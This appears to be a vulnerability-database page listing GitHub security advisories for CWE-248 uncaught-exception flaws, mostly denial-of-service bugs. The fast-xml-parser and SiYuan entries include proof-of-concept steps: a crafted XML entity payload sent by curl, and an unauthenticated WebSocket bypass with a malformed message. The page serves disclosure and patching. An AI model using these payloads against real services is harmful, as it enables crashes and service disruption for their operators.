CWE-248
AllowedUncaught Exception
Abstraction: Base · Status: Draft
An exception is thrown from a function, but it is not caught.
420 vulnerabilities reference this CWE, most recent first.
GHSA-2GW2-QGJG-XH6P
Vulnerability from github – Published: 2025-02-20 20:24 – Updated: 2025-02-20 20:24Impact
Ledger crash. A user is able to initialize a post-genesis validator with a negative commission rate using the --force flag. If this validator gets into the consensus set, then when computing PoS inflation inside fn update_rewards_products_and_mint_inflation, an instance of mul_floor will cause the return of an Err, which causes finalize_block to error.
Patches
This issue has been patched in apps version 1.1.0. The PoS validity predicate now enforces that the commission rate is not negative and any transaction that fails the check will be rejected, both for newly initialized validators and for commission rate change of an existing validator.
Workarounds
There are no workarounds and users are advised to upgrade.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "namada-apps"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.1.0"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.0.0"
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-20T20:24:19Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Impact\n\nLedger crash. A user is able to initialize a post-genesis validator with a negative commission rate using the `--force` flag. If this validator gets into the consensus set, then when computing PoS inflation inside `fn update_rewards_products_and_mint_inflation`, an instance of `mul_floor` will cause the return of an `Err`, which causes `finalize_block` to error.\n\n### Patches\n\nThis issue has been patched in apps version 1.1.0. The PoS validity predicate now enforces that the commission rate is not negative and any transaction that fails the check will be rejected, both for newly initialized validators and for commission rate change of an existing validator.\n\n### Workarounds\n\nThere are no workarounds and users are advised to upgrade.",
"id": "GHSA-2gw2-qgjg-xh6p",
"modified": "2025-02-20T20:24:19Z",
"published": "2025-02-20T20:24:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/anoma/namada/security/advisories/GHSA-2gw2-qgjg-xh6p"
},
{
"type": "PACKAGE",
"url": "https://github.com/anoma/namada"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Namada-apps allows Post-Genesis Validator Bypass"
}
GHSA-2QM5-PR8V-RJVP
Vulnerability from github – Published: 2025-09-25 18:30 – Updated: 2025-09-29 18:33A syntax error in the component proxy_tensor.py of pytorch v2.7.0 allows attackers to cause a Denial of Service (DoS).
{
"affected": [],
"aliases": [
"CVE-2025-55553"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-25T16:15:34Z",
"severity": "HIGH"
},
"details": "A syntax error in the component proxy_tensor.py of pytorch v2.7.0 allows attackers to cause a Denial of Service (DoS).",
"id": "GHSA-2qm5-pr8v-rjvp",
"modified": "2025-09-29T18:33:12Z",
"published": "2025-09-25T18:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55553"
},
{
"type": "WEB",
"url": "https://github.com/pytorch/pytorch/issues/151432"
},
{
"type": "WEB",
"url": "https://github.com/pytorch/pytorch/pull/154645"
},
{
"type": "WEB",
"url": "https://gist.github.com/shaoyuyoung/0e7d2a586297ae9c8ed14d8706749efc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2XPC-6R4R-V2HH
Vulnerability from github – Published: 2023-11-01 18:30 – Updated: 2023-11-01 18:30A vulnerability in ICMPv6 processing of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. This vulnerability is due to improper processing of ICMPv6 messages. An attacker could exploit this vulnerability by sending crafted ICMPv6 messages to a targeted Cisco ASA or FTD system with IPv6 enabled. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.
{
"affected": [],
"aliases": [
"CVE-2023-20086"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-01T17:15:11Z",
"severity": "HIGH"
},
"details": "A vulnerability in ICMPv6 processing of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. This vulnerability is due to improper processing of ICMPv6 messages. An attacker could exploit this vulnerability by sending crafted ICMPv6 messages to a targeted Cisco ASA or FTD system with IPv6 enabled. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.",
"id": "GHSA-2xpc-6r4r-v2hh",
"modified": "2023-11-01T18:30:33Z",
"published": "2023-11-01T18:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20086"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-icmpv6-t5TzqwNd"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-345M-8C2P-V3FJ
Vulnerability from github – Published: 2024-04-27 00:30 – Updated: 2024-04-27 00:30Malformed S2 Nonce Get command classes can be sent to crash the gateway. A hard reset is required to recover the gateway.
{
"affected": [],
"aliases": [
"CVE-2024-3052"
],
"database_specific": {
"cwe_ids": [
"CWE-248",
"CWE-754"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-26T22:15:08Z",
"severity": "HIGH"
},
"details": "\nMalformed S2 Nonce Get command classes can be sent to crash the gateway. A hard reset is required to recover the gateway.",
"id": "GHSA-345m-8c2p-v3fj",
"modified": "2024-04-27T00:30:38Z",
"published": "2024-04-27T00:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3052"
},
{
"type": "WEB",
"url": "https://community.silabs.com/068Vm0000045w2j"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3677-XG45-9RPH
Vulnerability from github – Published: 2025-02-06 21:32 – Updated: 2025-02-06 21:32IBM EntireX 11.1 could allow a local user to cause a denial of service due to an unhandled error and fault isolation.
{
"affected": [],
"aliases": [
"CVE-2025-0158"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-06T21:15:21Z",
"severity": "MODERATE"
},
"details": "IBM EntireX 11.1 could allow a local user to cause a denial of service due to an unhandled error and fault isolation.",
"id": "GHSA-3677-xg45-9rph",
"modified": "2025-02-06T21:32:09Z",
"published": "2025-02-06T21:32:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0158"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7182693"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-37QJ-FRW5-HHJH
Vulnerability from github – Published: 2026-01-30 20:10 – Updated: 2026-02-11 23:13Summary
A RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., � or �). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input.
Details
The vulnerability exists in /src/xmlparser/OrderedObjParser.js at lines 44-45:
"num_dec": { regex: /&#([0-9]{1,7});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 10)) },
"num_hex": { regex: /&#x([0-9a-fA-F]{1,6});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 16)) },
The String.fromCodePoint() method throws a RangeError when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this:
- [0-9]{1,7} matches up to 9,999,999
- [0-9a-fA-F]{1,6} matches up to 0xFFFFFF (16,777,215)
The entity replacement in replaceEntitiesValue() (line 452) has no try-catch:
val = val.replace(entity.regex, entity.val);
This causes the RangeError to propagate uncaught, crashing the parser and any application using it.
PoC
Setup
Create a directory with these files:
poc/
├── package.json
├── server.js
package.json
{ "dependencies": { "fast-xml-parser": "^5.3.3" } }
server.js
const http = require('http');
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser({ processEntities: true, htmlEntities: true });
http.createServer((req, res) => {
if (req.method === 'POST' && req.url === '/parse') {
let body = '';
req.on('data', c => body += c);
req.on('end', () => {
const result = parser.parse(body); // No try-catch - will crash!
res.end(JSON.stringify(result));
});
} else {
res.end('POST /parse with XML body');
}
}).listen(3000, () => console.log('http://localhost:3000'));
Run
# Setup
npm install
# Terminal 1: Start server
node server.js
# Terminal 2: Send malicious payload (server will crash)
curl -X POST -H "Content-Type: application/xml" -d '<?xml version="1.0"?><root>�</root>' http://localhost:3000/parse
Result
Server crashes with:
RangeError: Invalid code point 9999999
Alternative Payloads
<!-- Hex variant -->
<?xml version="1.0"?><root>�</root>
<!-- In attribute -->
<?xml version="1.0"?><root attr="�"/>
Impact
Denial of Service (DoS):* Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects:
- API servers accepting XML payloads
- File processors parsing uploaded XML files
- Message queues consuming XML messages
- RSS/Atom feed parsers
- SOAP/XML-RPC services
A single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.3.3"
},
"package": {
"ecosystem": "npm",
"name": "fast-xml-parser"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.9"
},
{
"fixed": "5.3.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25128"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-30T20:10:14Z",
"nvd_published_at": "2026-01-30T16:16:14Z",
"severity": "HIGH"
},
"details": "### Summary\nA RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., `\u0026#9999999;` or `\u0026#xFFFFFF;`). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input.\n\n### Details\nThe vulnerability exists in `/src/xmlparser/OrderedObjParser.js` at lines 44-45:\n\n```javascript\n\"num_dec\": { regex: /\u0026#([0-9]{1,7});/g, val : (_, str) =\u003e String.fromCodePoint(Number.parseInt(str, 10)) },\n\"num_hex\": { regex: /\u0026#x([0-9a-fA-F]{1,6});/g, val : (_, str) =\u003e String.fromCodePoint(Number.parseInt(str, 16)) },\n```\n\nThe `String.fromCodePoint()` method throws a `RangeError` when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this:\n- `[0-9]{1,7}` matches up to 9,999,999\n- `[0-9a-fA-F]{1,6}` matches up to 0xFFFFFF (16,777,215)\n\nThe entity replacement in `replaceEntitiesValue()` (line 452) has no try-catch:\n\n```javascript\nval = val.replace(entity.regex, entity.val);\n```\n\nThis causes the RangeError to propagate uncaught, crashing the parser and any application using it.\n### PoC\n#### Setup\n\nCreate a directory with these files:\n\n```\npoc/\n\u251c\u2500\u2500 package.json\n\u251c\u2500\u2500 server.js\n```\n\n**package.json**\n```json\n{ \"dependencies\": { \"fast-xml-parser\": \"^5.3.3\" } }\n```\n\n**server.js**\n```javascript\nconst http = require(\u0027http\u0027);\nconst { XMLParser } = require(\u0027fast-xml-parser\u0027);\n\nconst parser = new XMLParser({ processEntities: true, htmlEntities: true });\n\nhttp.createServer((req, res) =\u003e {\n if (req.method === \u0027POST\u0027 \u0026\u0026 req.url === \u0027/parse\u0027) {\n let body = \u0027\u0027;\n req.on(\u0027data\u0027, c =\u003e body += c);\n req.on(\u0027end\u0027, () =\u003e {\n const result = parser.parse(body); // No try-catch - will crash!\n res.end(JSON.stringify(result));\n });\n } else {\n res.end(\u0027POST /parse with XML body\u0027);\n }\n}).listen(3000, () =\u003e console.log(\u0027http://localhost:3000\u0027));\n```\n\n#### Run\n\n```bash\n# Setup\nnpm install\n\n# Terminal 1: Start server\nnode server.js\n\n# Terminal 2: Send malicious payload (server will crash)\ncurl -X POST -H \"Content-Type: application/xml\" -d \u0027\u003c?xml version=\"1.0\"?\u003e\u003croot\u003e\u0026#9999999;\u003c/root\u003e\u0027 http://localhost:3000/parse\n``` \n#### Result\n\nServer crashes with:\n```\nRangeError: Invalid code point 9999999\n```\n\n#### Alternative Payloads\n\n```xml\n\u003c!-- Hex variant --\u003e\n\u003c?xml version=\"1.0\"?\u003e\u003croot\u003e\u0026#xFFFFFF;\u003c/root\u003e\n\n\u003c!-- In attribute --\u003e\n\u003c?xml version=\"1.0\"?\u003e\u003croot attr=\"\u0026#9999999;\"/\u003e\n```\n\n### Impact\n*Denial of Service (DoS):** Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects:\n\n- **API servers** accepting XML payloads\n- **File processors** parsing uploaded XML files\n- **Message queues** consuming XML messages\n- **RSS/Atom feed parsers**\n- **SOAP/XML-RPC services**\n\nA single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.",
"id": "GHSA-37qj-frw5-hhjh",
"modified": "2026-02-11T23:13:02Z",
"published": "2026-01-30T20:10:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-37qj-frw5-hhjh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25128"
},
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/4e387f61c4a5cef792f6a2f42467013290bf95dc"
},
{
"type": "PACKAGE",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser"
},
{
"type": "WEB",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "fast-xml-parser has RangeError DoS Numeric Entities Bug"
}
GHSA-3F57-W2RP-72FC
Vulnerability from github – Published: 2022-05-17 00:15 – Updated: 2022-11-08 12:43A long URL proxy request lead to java.nio.BufferOverflowException in Undertow.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.undertow:undertow-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.4.0"
},
{
"fixed": "1.4.3.Final"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "io.undertow:undertow-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.25.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2016-7046"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2022-11-08T12:43:33Z",
"nvd_published_at": "2016-10-03T21:59:00Z",
"severity": "MODERATE"
},
"details": "A long URL proxy request lead to java.nio.BufferOverflowException in Undertow.",
"id": "GHSA-3f57-w2rp-72fc",
"modified": "2022-11-08T12:43:33Z",
"published": "2022-05-17T00:15:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-7046"
},
{
"type": "WEB",
"url": "https://github.com/undertow-io/undertow/commit/c518b5a1784061d807efedcef0a03fcd35a53de2"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1376646"
},
{
"type": "PACKAGE",
"url": "https://github.com/undertow-io/undertow"
},
{
"type": "WEB",
"url": "https://issues.redhat.com/browse/UNDERTOW-835"
},
{
"type": "WEB",
"url": "https://security-tracker.debian.org/tracker/CVE-2016-7046"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Undertow Uncaught Exception vulnerability"
}
GHSA-3G9H-9HP4-654V
Vulnerability from github – Published: 2026-03-18 20:11 – Updated: 2026-03-25 18:12Summary
The SiYuan kernel WebSocket server accepts unauthenticated connections when a specific “auth keepalive” query parameter is present. After connection, incoming messages are parsed using unchecked type assertions on attacker-controlled JSON.
A remote attacker can send malformed messages that trigger a runtime panic, potentially crashing the kernel process and causing denial of service.
Details
1. Authentication Bypass via Keepalive Query
Unauthenticated connections are accepted if the request URI matches a specific pattern intended for an authentication page keepalive.
File: kernel/server/serve.go
if !authOk {
authOk = strings.Contains(s.Request.RequestURI, "/ws?app=siyuan") &&
strings.Contains(s.Request.RequestURI, "&id=auth&type=auth")
}
2. Unsafe Type Assertions on Untrusted Input
Incoming JSON messages are parsed into a generic map and fields are accessed without validation.
File: kernel/server/serve.go
cmdStr := request["cmd"].(string)
cmdId := request["reqId"].(float64)
param := request["param"].(map[string]interface{})
Malformed or missing fields trigger a runtime panic. The handler does not implement local panic recovery, allowing crashes to propagate.
PoC
Step 1 — Prepare workspace directory
mkdir -p ./workspace
Step 2 — Run SiYuan container
docker run -d \
-p 6806:6806 \
-e SIYUAN_ACCESS_AUTH_CODE_BYPASS=true \
-v $(pwd)/workspace:/siyuan/workspace \
b3log/siyuan \
--workspace=/siyuan/workspace
Service becomes reachable at http://127.0.0.1:6806
Step 3 — Confirm service availability
Open in browser:
http://127.0.0.1:6806
Step 4 — Connect to unauthenticated WebSocket endpoint
ws://127.0.0.1:6806/ws?app=siyuan&id=auth&type=auth
This connection is accepted without credentials.
Step 5 — Send malformed payload
Payload:
{}
Step 6 — Observe behavior
Monitor container logs:
docker logs -f <container_id>
Impact
An unauthenticated attacker with network access can repeatedly crash the kernel, causing persistent denial of service.
Impact is highest when the service is exposed beyond localhost (e.g., Docker deployments, reverse proxies, LAN access, or public hosting).
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.6.1"
},
"package": {
"ecosystem": "Go",
"name": "github.com/siyuan-note/siyuan/kernel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33203"
],
"database_specific": {
"cwe_ids": [
"CWE-248",
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-18T20:11:00Z",
"nvd_published_at": "2026-03-20T23:16:45Z",
"severity": "HIGH"
},
"details": "## Summary\nThe SiYuan kernel WebSocket server accepts unauthenticated connections when a specific \u201cauth keepalive\u201d query parameter is present. After connection, incoming messages are parsed using unchecked type assertions on attacker-controlled JSON.\n\nA remote attacker can send malformed messages that trigger a runtime panic, potentially crashing the kernel process and causing denial of service.\n\n## Details\n**1. Authentication Bypass via Keepalive Query**\n\nUnauthenticated connections are accepted if the request URI matches a specific pattern intended for an authentication page keepalive.\n\n**File: kernel/server/serve.go**\n\n```\nif !authOk {\n authOk = strings.Contains(s.Request.RequestURI, \"/ws?app=siyuan\") \u0026\u0026\n strings.Contains(s.Request.RequestURI, \"\u0026id=auth\u0026type=auth\")\n}\n\n```\n\n**2. Unsafe Type Assertions on Untrusted Input**\n\nIncoming JSON messages are parsed into a generic map and fields are accessed without validation.\n\n**File: kernel/server/serve.go**\n\n```\ncmdStr := request[\"cmd\"].(string)\ncmdId := request[\"reqId\"].(float64)\nparam := request[\"param\"].(map[string]interface{})\n\n```\nMalformed or missing fields trigger a runtime panic.\nThe handler does not implement local panic recovery, allowing crashes to propagate.\n\n## PoC\n**Step 1 \u2014 Prepare workspace directory**\n\n```sh\nmkdir -p ./workspace\n```\n\n**Step 2 \u2014 Run SiYuan container**\n\n```\ndocker run -d \\\n -p 6806:6806 \\\n -e SIYUAN_ACCESS_AUTH_CODE_BYPASS=true \\\n -v $(pwd)/workspace:/siyuan/workspace \\\n b3log/siyuan \\\n --workspace=/siyuan/workspace\n```\n\nService becomes reachable at http://127.0.0.1:6806\n\n**Step 3 \u2014 Confirm service availability**\n\nOpen in browser:\n\n```sh\nhttp://127.0.0.1:6806\n```\n\n**Step 4 \u2014 Connect to unauthenticated WebSocket endpoint**\n\n```sh\nws://127.0.0.1:6806/ws?app=siyuan\u0026id=auth\u0026type=auth\n```\n\nThis connection is accepted without credentials.\n\n**Step 5 \u2014 Send malformed payload**\n\nPayload:\n\n```sh\n\n{}\n\n```\n\n**Step 6 \u2014 Observe behavior**\n\nMonitor container logs:\n\n```sh\n\ndocker logs -f \u003ccontainer_id\u003e\n\n```\n## Impact\nAn unauthenticated attacker with network access can repeatedly crash the kernel, causing persistent denial of service.\n\nImpact is highest when the service is exposed beyond localhost (e.g., Docker deployments, reverse proxies, LAN access, or public hosting).",
"id": "GHSA-3g9h-9hp4-654v",
"modified": "2026-03-25T18:12:26Z",
"published": "2026-03-18T20:11:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-3g9h-9hp4-654v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33203"
},
{
"type": "PACKAGE",
"url": "https://github.com/siyuan-note/siyuan"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "SiYuan has an Unauthenticated WebSocket DoS via Auth Keepalive Bypass"
}
GHSA-3GMG-R977-HQCC
Vulnerability from github – Published: 2025-01-23 12:32 – Updated: 2026-02-23 12:31Unexpected server crash in database driver in M-Files Server before 25.1.14445.5 allows a highly privileged attacker to cause denial of service via configuration change.
{
"affected": [],
"aliases": [
"CVE-2025-0648"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-23T11:15:11Z",
"severity": "MODERATE"
},
"details": "Unexpected server crash in database driver in M-Files Server before 25.1.14445.5 allows a highly privileged attacker to cause denial of service via configuration change.",
"id": "GHSA-3gmg-r977-hqcc",
"modified": "2026-02-23T12:31:29Z",
"published": "2025-01-23T12:32:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0648"
},
{
"type": "WEB",
"url": "https://empower.m-files.com/security-advisories/CVE-2025-0648"
},
{
"type": "WEB",
"url": "https://product.m-files.com/security-advisories/cve-2025-0648"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-3HJG-VC7R-RCRW
Vulnerability from github – Published: 2022-04-07 15:20 – Updated: 2022-04-07 15:20Impact
An attacker using the Trailer header as part of the request against proxy endpoints has the ability to take down the server.
All Podium layouts that include podlets with proxy endpoints are affected.
Patches
@podium/layout which is the main way developers/users are vulnerable to this exploit, has been patched in version 4.6.110. All earlier versions are vulnerable.
@podium/proxy which is the source of the vulnerability and is used by @podium/layout has been patched in version 4.2.74. All earlier versions are vulnerable.
Workarounds
It is not easily possible to work around this issue without upgrading. We recommend upgrading @podium/layout and/or @podium/proxy as soon as possible.
For more information
If you have any questions or comments about this advisory: * Open an issue in podium-lib/issues
Credits
The vulnerability was reported by krynos from Ercoli Consulting via FINN.no's private bug bounty program
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@podium/layout"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.6.110"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@podium/proxy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.2.74"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-24822"
],
"database_specific": {
"cwe_ids": [
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2022-04-07T15:20:23Z",
"nvd_published_at": "2022-04-06T18:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\nAn attacker using the `Trailer` header as part of the request against proxy endpoints has the ability to take down the server.\nAll Podium layouts that include podlets with proxy endpoints are affected.\n\n### Patches\n`@podium/layout` which is the main way developers/users are vulnerable to this exploit, has been patched in version `4.6.110`. All earlier versions are vulnerable.\n`@podium/proxy` which is the source of the vulnerability and is used by `@podium/layout` has been patched in version `4.2.74`. All earlier versions are vulnerable.\n\n### Workarounds\nIt is not easily possible to work around this issue without upgrading. We recommend upgrading `@podium/layout` and/or `@podium/proxy` as soon as possible.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [podium-lib/issues](https://github.com/podium-lib/issues)\n\n### Credits\nThe vulnerability was reported by [krynos](https://hackerone.com/krynos) from [Ercoli Consulting](https://www.ercoliconsulting.eu/) via FINN.no\u0027s private bug bounty program\n",
"id": "GHSA-3hjg-vc7r-rcrw",
"modified": "2022-04-07T15:20:23Z",
"published": "2022-04-07T15:20:23Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/podium-lib/proxy/security/advisories/GHSA-3hjg-vc7r-rcrw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24822"
},
{
"type": "WEB",
"url": "https://github.com/podium-lib/layout/commit/fe43e655432b0a5f07b6475f67babcc2588fb039"
},
{
"type": "WEB",
"url": "https://github.com/podium-lib/proxy/commit/9698a40df081217ce142d4de71f929baaa339cdf"
},
{
"type": "WEB",
"url": "https://github.com/podium-lib/layout/releases/tag/v4.6.110"
},
{
"type": "WEB",
"url": "https://github.com/podium-lib/proxy/releases/tag/v4.2.74"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Denial of Service vulnerability in @podium/layout and @podium/proxy"
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.